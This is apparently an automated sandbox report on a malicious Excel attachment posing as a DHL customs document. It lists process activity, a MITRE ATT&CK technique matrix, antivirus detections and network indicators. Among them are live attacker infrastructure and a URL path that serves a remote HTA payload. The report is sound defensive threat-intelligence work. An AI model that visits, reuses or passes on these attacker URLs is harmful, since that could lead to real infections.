Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsStatic file information: File size 1275904 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF3F1E3330D4663D02.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: DHL AWB CUSTOM CLEARANCE.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsStream path 'Workbook' entropy: 7.99909358593 (max. 8.0)
Source: 95131000.0.drStream path 'Workbook' entropy: 7.99638487346 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 812Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DHL AWB CUSTOM CLEARANCE.xls25%VirustotalBrowse
DHL AWB CUSTOM CLEARANCE.xls34%ReversingLabsDocument-Excel.Exploit.TempInj
DHL AWB CUSTOM CLEARANCE.xls100%AviraEXP/TempInj.MN
DHL AWB CUSTOM CLEARANCE.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/hANTnNH4?&astrology=wet0%Avira URL Cloudsafe
https://s.deemos.com/hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    s-part-0017.t-0009.fb-t-msedge.net
    13.107.253.45
    truefalse
      high
      otelrules.svc.static.microsoft
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://s.deemos.com/hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavementfalse
        • Avira URL Cloud: safe
        unknown
        https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://s.deemos.com/hANTnNH4?&astrology=wetDHL AWB CUSTOM CLEARANCE.xls, 95131000.0.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          14.103.79.10
          s.deemos.comChina
          18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
          131.226.2.34
          unknownUnited States
          16797UNASSIGNEDfalse
          13.107.253.45
          s-part-0017.t-0009.fb-t-msedge.netUnited States
          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1591180
          Start date and time:2025-01-14 19:14:15 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 42s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:DHL AWB CUSTOM CLEARANCE.xls
          Detection:MAL
          Classification:mal80.expl.winXLS@6/15@2/3
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 52.109.28.48, 23.38.98.96, 23.38.98.104, 52.113.194.132, 52.168.117.174, 23.212.88.34, 52.109.76.240, 20.42.65.85, 40.126.32.136, 172.202.163.200, 40.126.32.68
          • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, chrome.cloudflare-dns.com, azurefd-t-fb-prod.trafficmanager.net, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, otelrules.afd.azureedge.net, oneocsp.microsoft.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, c.pki.goog, res-1-tls.cdn.office.net, windows.msn.com, e40491.dscg.akamaiedge.net, ecs.office.com, client.wns.windows.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, onedscolprdeus05.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, x1.c.lencr.org, uks-azsc-000.roaming.officeapps.live.com, neu-azs
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          13:16:17API Interceptor858x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          14.103.79.10P-04071A.xlsGet hashmaliciousUnknownBrowse
            P-04071A.xlsGet hashmaliciousUnknownBrowse
              P-04071A.xlsGet hashmaliciousUnknownBrowse
                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                  Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                    Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                            131.226.2.34P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                            • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                            13.107.253.45https://sites.google.com/view/01-25sharepoint/Get hashmaliciousHTMLPhisherBrowse
                              https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                https://eu.jotform.com/app/250092704521347Get hashmaliciousUnknownBrowse
                                  http://loginmicrosoftonline.Bdo.scoremasters.gr/cache/cdn?email=christian.wernli@bdo.chGet hashmaliciousUnknownBrowse
                                    https://p3rsa.appdocumentcenter.com/BpdLOGet hashmaliciousHTMLPhisherBrowse
                                      https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                        https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                          Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                            https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                              https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s.deemos.comP-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
